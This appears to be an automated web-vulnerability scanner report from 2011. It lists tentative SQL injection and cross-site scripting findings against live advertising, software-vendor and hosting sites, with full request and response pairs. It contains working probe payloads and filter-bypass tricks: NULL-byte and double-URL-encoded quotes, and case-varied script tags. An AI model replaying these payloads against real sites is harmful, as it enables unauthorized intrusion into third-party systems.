1.1. http://ad.doubleclick.net/adi/N3671.tribe.net/B5229711.4 [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Tentative
Host: http://ad.doubleclick.net
Path: /adi/N3671.tribe.net/B5229711.4
Issue detail
The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the name of an arbitrarily supplied request parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.
Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.
Request 1
GET /adi/N3671.tribe.net/B5229711.4;sz=300x250;pc=[TPAS_ID];click=http://a.tribalfusion.com/h.click/aNmOvJ2P3eQP7C3HQr0tBJpWEy5mYW3s77TV3cUcbjRAQvUtFUUbF23bIsUajpTEQcQTQFSGYIPUenPHvbVcQQ4FPomteO0aTp3WbFPcZbZa46JZdptToVWbfXUfaYF790qEsSrUGWUQXTHUYmbjsPFryYavn3a3c2qr4maMIUGJRfuxlau/;ord=1246537210?&1'%20and%201%3d1--%20=1 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://techie-buzz.com/softwares/how-to-check-pagerank-in-google-chrome.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c708f553300004b|2818894/957634/15036,578176/951462/15032,1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb; __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg; L2676=1.1300710919721
Response 1
HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Sun, 20 Mar 2011 17:25:59 GMT
Vary: Accept-Encoding
Expires: Sun, 20 Mar 2011 17:25:59 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6872
<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve ...[SNIP]... <!-- Code auto-generated on Thu Mar 03 15:57:06 EST 2011 --> <script src="http://s0.2mdn.net/879366/flashwrite_1_2.js"></script> <SCRIPT LANGUAGE="JavaScript"> <!-- function DCFlash(id,pVM){ var swf = "http://s0.2mdn.net/998766/1013_300x250_Promo_FreePhone_OptimusTv2_Stnd.swf"; var gif = "http://s0.2mdn.net/998766/1013_300x250_Promo_FreePhone_OptimusTv2_Static.jpg"; var minV = 9; var FWH = ' width="300" height="250" '; var url = escape("http://ad.doubleclick.net/click%3Bh%3Dv8/3ad0/7/d6/%2a/r%3B236462304%3B0-0%3B0%3B59988977%3B4307-300/250%3B40697905/40715692/2%3B%3B%7Eokv%3D%3Bpc%3D%5BTPAS_ID%5D%3B%3B%7Esscs%3D%3fhttp://a.tribalfusion.com/h.click/aNmOvJ2P3eQP7C3HQr0tBJpWEy5mYW3s77TV3cUcbjRAQvUtFUUbF23bIsUajpTEQcQTQFSGYIPUenPHvbVcQQ4FPomteO0aTp3WbFPcZbZa46JZdptToVWbfXUfaYF790qEsSrUGWUQXTHUYmbjsPFryYavn3a3c2qr4maMIUGJRfuxlau/http://www.t-mobile.com/shop/Phones/cell-phone-detail.aspx?cell-phone=LG-Optimus-T-Black&cm_mmc_o=Kbl5kzYCjC5AygtzlwCjCR5fbFAl%20aCjCdyww%20VtBEwl"); var fscUrl = url; var fscUrlClickTagFound = false; var wmode = "opaque"; var bg = ""; var dcallowscriptaccess = "never";
var openWindow = "false"; var winW = 0; var winH = 0; var winL = 0; var winT = 0;
var moviePath=swf.substring(0,swf.lastIndexOf("/")); var sm=new Array();
var defaultCtVal = escape("http://ad.doubleclick.net/click%3Bh%3Dv8/3ad0/7/d6/%2a/r%3B236462304%3B0-0%3B0%3B59988977%3B4307-300/250%3B40697905/40715692/2%3B%3B%7Eokv%3D%3Bpc%3D%5BTPAS_ID%5D%3B%3B%7Esscs%3D%3fhttp://a.tribalfusion.com/h.click/aNmOvJ2P3eQP7C3HQr0tBJpWEy5mYW3s77TV3cUcbjRAQvUtFUUbF23bIsUajpTEQcQTQFSGYIPUenPHvbVcQQ4FPomteO0aTp3WbFPcZbZa46JZdptToVWbfXUfaYF790qEsSrUGWUQXTHUYmbjsPFryYavn3a3c2qr4maMIUGJRfuxlau/http://www.t-mobile.com/shop/Phones/cell-phone-detail.aspx?cell-phone=LG-Optimus-T-Black&cm_mmc_o=Kbl5kzYCjC5AygtzlwCjCR5fbFAl%20aCjCdyww%20VtBEwl"); var ctp=new Array(); var ctv=new Array(); ctp[0] = "clickTag"; ctv[0] = "";
var fv='"moviePath='+moviePath+'/'+'&moviepath='+moviePath+'/'; for(i=1;i<sm.length;i++){i ...[SNIP]...
Request 2
GET /adi/N3671.tribe.net/B5229711.4;sz=300x250;pc=[TPAS_ID];click=http://a.tribalfusion.com/h.click/aNmOvJ2P3eQP7C3HQr0tBJpWEy5mYW3s77TV3cUcbjRAQvUtFUUbF23bIsUajpTEQcQTQFSGYIPUenPHvbVcQQ4FPomteO0aTp3WbFPcZbZa46JZdptToVWbfXUfaYF790qEsSrUGWUQXTHUYmbjsPFryYavn3a3c2qr4maMIUGJRfuxlau/;ord=1246537210?&1'%20and%201%3d2--%20=1 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://techie-buzz.com/softwares/how-to-check-pagerank-in-google-chrome.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c708f553300004b|2818894/957634/15036,578176/951462/15032,1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb; __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg; L2676=1.1300710919721
Response 2
HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Sun, 20 Mar 2011 17:26:00 GMT
Vary: Accept-Encoding
Expires: Sun, 20 Mar 2011 17:26:00 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6890
<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve ...[SNIP]... <!-- Code auto-generated on Thu Mar 03 16:23:16 EST 2011 --> <script src="http://s0.2mdn.net/879366/flashwrite_1_2.js"></script> <SCRIPT LANGUAGE="JavaScript"> <!-- function DCFlash(id,pVM){ var swf = "http://s0.2mdn.net/998766/1015_300x250_Promo_FreePhone_SamsungGravityTv2_Stnd.swf"; var gif = "http://s0.2mdn.net/998766/1015_300x250_Promo_FreePhone_SamsungGravityTv2_Static.jpg"; var minV = 9; var FWH = ' width="300" height="250" '; var url = escape("http://ad.doubleclick.net/click%3Bh%3Dv8/3ad0/7/d6/%2a/x%3B236462304%3B1-0%3B0%3B59988977%3B4307-300/250%3B40710683/40728470/2%3B%3B%7Eokv%3D%3Bpc%3D%5BTPAS_ID%5D%3B%3B%7Esscs%3D%3fhttp://a.tribalfusion.com/h.click/aNmOvJ2P3eQP7C3HQr0tBJpWEy5mYW3s77TV3cUcbjRAQvUtFUUbF23bIsUajpTEQcQTQFSGYIPUenPHvbVcQQ4FPomteO0aTp3WbFPcZbZa46JZdptToVWbfXUfaYF790qEsSrUGWUQXTHUYmbjsPFryYavn3a3c2qr4maMIUGJRfuxlau/http://www.t-mobile.com/shop/Phones/cell-phone-detail.aspx?cell-phone=Samsung-Gravity-T&cm_mmc_o=Kbl5kzYCjC5AygtzlwCjC7yzMbfY%20aCjCdyww%20VtBEwl"); var fscUrl = url; var fscUrlClickTagFound = false; var wmode = "opaque"; var bg = ""; var dcallowscriptaccess = "never";
var openWindow = "false"; var winW = 0; var winH = 0; var winL = 0; var winT = 0;
var moviePath=swf.substring(0,swf.lastIndexOf("/")); var sm=new Array();
var defaultCtVal = escape("http://ad.doubleclick.net/click%3Bh%3Dv8/3ad0/7/d6/%2a/x%3B236462304%3B1-0%3B0%3B59988977%3B4307-300/250%3B40710683/40728470/2%3B%3B%7Eokv%3D%3Bpc%3D%5BTPAS_ID%5D%3B%3B%7Esscs%3D%3fhttp://a.tribalfusion.com/h.click/aNmOvJ2P3eQP7C3HQr0tBJpWEy5mYW3s77TV3cUcbjRAQvUtFUUbF23bIsUajpTEQcQTQFSGYIPUenPHvbVcQQ4FPomteO0aTp3WbFPcZbZa46JZdptToVWbfXUfaYF790qEsSrUGWUQXTHUYmbjsPFryYavn3a3c2qr4maMIUGJRfuxlau/http://www.t-mobile.com/shop/Phones/cell-phone-detail.aspx?cell-phone=Samsung-Gravity-T&cm_mmc_o=Kbl5kzYCjC5AygtzlwCjC7yzMbfY%20aCjCdyww%20VtBEwl"); var ctp=new Array(); var ctv=new Array(); ctp[0] = "clickTag"; ctv[0] = "";
var fv='"moviePath='+moviePath+'/'+'&moviepath='+moviePath+'/'; for(i=1;i<sm.l ...[SNIP]...
The sz parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the sz parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.
Request 1
GET /adi/N5621.66.2412875475321/B4682155;sz=728x90;;click=http://yads.zedo.com/ads2/c?a=914396%3Bn=1219%3Bx=24093%3Bc=1219000054,1219000049%3Bg=172%3Bi=0%3B1=8%3B2=1%3Bs=1%3Bg=172%3Bm=82%3Bw=47%3Bi=0%3Bu=jhmxpQoBADYAAET@BzgAAAAW~022111%3Bk%3D;ord=0.5315556428395212?%00' HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.alexa.com/siteinfo/xss.cx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c708f553300004b|2818894/957634/15036,578176/951462/15032,1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb; __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg; L2676=1.1300710919721
Response 1
HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Sun, 20 Mar 2011 17:14:24 GMT
Vary: Accept-Encoding
Expires: Sun, 20 Mar 2011 17:14:24 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6809
<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve ...[SNIP]... h"];if(x && x.description){var pVF=x.description;var y=pVF.indexOf("Flash ")+6;pVM=pVF.substring(y,pVF.indexOf(".",y));}} else if (window.ActiveXObject && window.execScript){ window.execScript('on error resume next\npVM=2\ndo\npVM=pVM+1\nset swControl = CreateObject("ShockwaveFlash.ShockwaveFlash."&pVM)\nloop while Err = 0\nOn Error Resume Next\npVM=pVM-1\nSub '+DCid+'_FSCommand(ByVal command, ByVal ...[SNIP]...
Request 2
GET /adi/N5621.66.2412875475321/B4682155;sz=728x90;;click=http://yads.zedo.com/ads2/c?a=914396%3Bn=1219%3Bx=24093%3Bc=1219000054,1219000049%3Bg=172%3Bi=0%3B1=8%3B2=1%3Bs=1%3Bg=172%3Bm=82%3Bw=47%3Bi=0%3Bu=jhmxpQoBADYAAET@BzgAAAAW~022111%3Bk%3D;ord=0.5315556428395212?%00'' HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.alexa.com/siteinfo/xss.cx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c708f553300004b|2818894/957634/15036,578176/951462/15032,1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb; __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg; L2676=1.1300710919721
Response 2
HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Sun, 20 Mar 2011 17:14:25 GMT
Vary: Accept-Encoding
Expires: Sun, 20 Mar 2011 17:14:25 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 827
The User-Agent HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the User-Agent HTTP header, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.
Request 1
GET /cart/ HTTP/1.1
Host: store.port80software.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16%2527
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=250101639.1300635924.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=250101639.1362439743.1300635924.1300635924.1300635924.1; __utmc=250101639; __utmb=250101639.1.10.1300635924; wooTracker=YYXS1OV81URAVM145O92CQZ0XO4NCMUZ; wooMeta=MjMxMDAmMSYwJjIwJjEzMDA2MzU5MTA2MjMmMTMwMDYzNTkxMDYyMyYmMTAwJiY1MDAwNzkmJiYm
Response 1
HTTP/1.0 404 Not Found
Content-Type: text/html
Content-Length: 8958
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8"> <title>store.po ...[SNIP]... <a href='getting/src/vessels.html'>failed.</a> ...[SNIP]...
Request 2
GET /cart/ HTTP/1.1
Host: store.port80software.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16%2527%2527
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=250101639.1300635924.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=250101639.1362439743.1300635924.1300635924.1300635924.1; __utmc=250101639; __utmb=250101639.1.10.1300635924; wooTracker=YYXS1OV81URAVM145O92CQZ0XO4NCMUZ; wooMeta=MjMxMDAmMSYwJjIwJjEzMDA2MzU5MTA2MjMmMTMwMDYzNTkxMDYyMyYmMTAwJiY1MDAwNzkmJiYm
Response 2
HTTP/1.0 404 Not Found
Content-Type: text/html
Content-Length: 2407
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8"> <title>store.po ...[SNIP]...
The Referer HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the Referer HTTP header, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
Request 1
GET / HTTP/1.1
Host: www.port80software.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?hl=en&q='
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=250101639.1300635924.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=250101639.1362439743.1300635924.1300635924.1300635924.1; wooTracker=YYXS1OV81URAVM145O92CQZ0XO4NCMUZ; _chartbeat2=2eui33kf9eu0s2nx; wooMeta=MjMxMDAmMSYxJjI0MjA0NyYxMzAwNjM1OTEwNjIzJjEzMDA2MzYxNTI2NTAmJjEwMCYmNTAwMDc5JiYmJg==; countrycode=XX
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8"> <title>www.port ...[SNIP]... <H2> "I have not failed. I've just found 10,000 ways that won't work." -<a href='../servlet/nature/first'> ...[SNIP]...
Request 2
GET / HTTP/1.1
Host: www.port80software.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?hl=en&q=''
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=250101639.1300635924.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=250101639.1362439743.1300635924.1300635924.1300635924.1; wooTracker=YYXS1OV81URAVM145O92CQZ0XO4NCMUZ; _chartbeat2=2eui33kf9eu0s2nx; wooMeta=MjMxMDAmMSYxJjI0MjA0NyYxMzAwNjM1OTEwNjIzJjEzMDA2MzYxNTI2NTAmJjEwMCYmNTAwMDc5JiYmJg==; countrycode=XX
Response 2
HTTP/1.1 200 OK
Cache-Control: private
Date: Sun, 20 Mar 2011 17:02:01 GMT
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: ASPSESSIONIDASTASRQD=DAIKIALCFAPJCAFOKFDFEKGL; path=/
Set-Cookie: 5873D2C108F9F3B348EA8C6BE7ACFBE27C8C378D=09C55D26877C72426084F1DE8284520DA0364363; path=/; HttpOnly;
Vary: Accept-Encoding
Content-Length: 22219
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US">
The __utmc cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the __utmc cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.
HTTP/1.0 404 Not Found
Content-Type: text/html
Content-Length: 8592
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8"> <title>www.port ...[SNIP]... <H3> "I have not failed. I've just found 10,000 ways that won't work."<a href='little.php?id=25911&pg=1940'> ...[SNIP]...
The Referer HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the Referer HTTP header, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8"> <title>www.port ...[SNIP]... <TD> "I have not failed. I've just found 10,000<a href='beauty?template=.shtml&id=30611&template=.php&item=18783&template=.jsp'> ...[SNIP]...
The User-Agent HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the User-Agent HTTP header, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.
HTTP/1.0 404 Not Found
Set-Cookie: 5873D2C108F9F3B348EA8C6BE7ACFBE27C8C378D=;path=/;Max-Age=0
Set-Cookie: ASPSESSIONIDASTASRQD=;path=/;Max-Age=0
Content-Type: text/html
Content-Length: 4751
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8"> <title>www.port ...[SNIP]... <H1>"I have not failed. I've just found 10,000 ways that won't work." - Thomas Alva Edison</H1> ...[SNIP]...
The value of REST URL parameter 3 submitted to the URL /xml/order/CloudDynamicServer is copied into a JavaScript string which is encapsulated in double quotation marks at the URL /xml/order/CloudDynamicServer. The payload be5ae</ScRiPt%20><ScRiPt>alert(1)</ScRiPt>0f854fb8bb3 was submitted in the REST URL parameter 3. This input was returned as be5ae</ScRiPt ><ScRiPt>alert(1)</ScRiPt>0f854fb8bb3 in a subsequent request for the URL /xml/order/CloudDynamicServer.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain expressions that are often used in XSS attacks but this can be circumvented by varying the case of the blocked expressions - for example, by submitting "ScRiPt" instead of "script".
The value of REST URL parameter 3 submitted to the URL /xml/order/DomaininfoMove is copied into a JavaScript string which is encapsulated in double quotation marks at the URL /xml/order/DomaininfoMove. The payload d1dbe</ScRiPt%20><ScRiPt>alert(1)</ScRiPt>3ccb96b7437 was submitted in the REST URL parameter 3. This input was returned as d1dbe</ScRiPt ><ScRiPt>alert(1)</ScRiPt>3ccb96b7437 in a subsequent request for the URL /xml/order/DomaininfoMove.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain expressions that are often used in XSS attacks but this can be circumvented by varying the case of the blocked expressions - for example, by submitting "ScRiPt" instead of "script".
Request 1
GET /xml/order/DomaininfoMoved1dbe</ScRiPt%20><ScRiPt>alert(1)</ScRiPt>3ccb96b7437;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&linkOrigin=Hosting&linkId=hd.nav.domainTransfer HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;
Request 2
GET /xml/order/DomaininfoMove;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&linkOrigin=Hosting&linkId=hd.nav.domainTransfer HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;
The value of REST URL parameter 3 submitted to the URL /xml/order/Eshops is copied into a JavaScript string which is encapsulated in double quotation marks at the URL /xml/order/Eshops. The payload f145e</ScRiPt%20><ScRiPt>alert(1)</ScRiPt>222daa67bf5 was submitted in the REST URL parameter 3. This input was returned as f145e</ScRiPt ><ScRiPt>alert(1)</ScRiPt>222daa67bf5 in a subsequent request for the URL /xml/order/Eshops.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain expressions that are often used in XSS attacks but this can be circumvented by varying the case of the blocked expressions - for example, by submitting "ScRiPt" instead of "script".
Request 1
GET /xml/order/Eshopsf145e</ScRiPt%20><ScRiPt>alert(1)</ScRiPt>222daa67bf5;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&linkOrigin=Hosting&linkId=hd.nav.ecommerce HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;
Request 2
GET /xml/order/Eshops;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&linkOrigin=Hosting&linkId=hd.nav.ecommerce HTTP/1.1
Host: order.1and1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
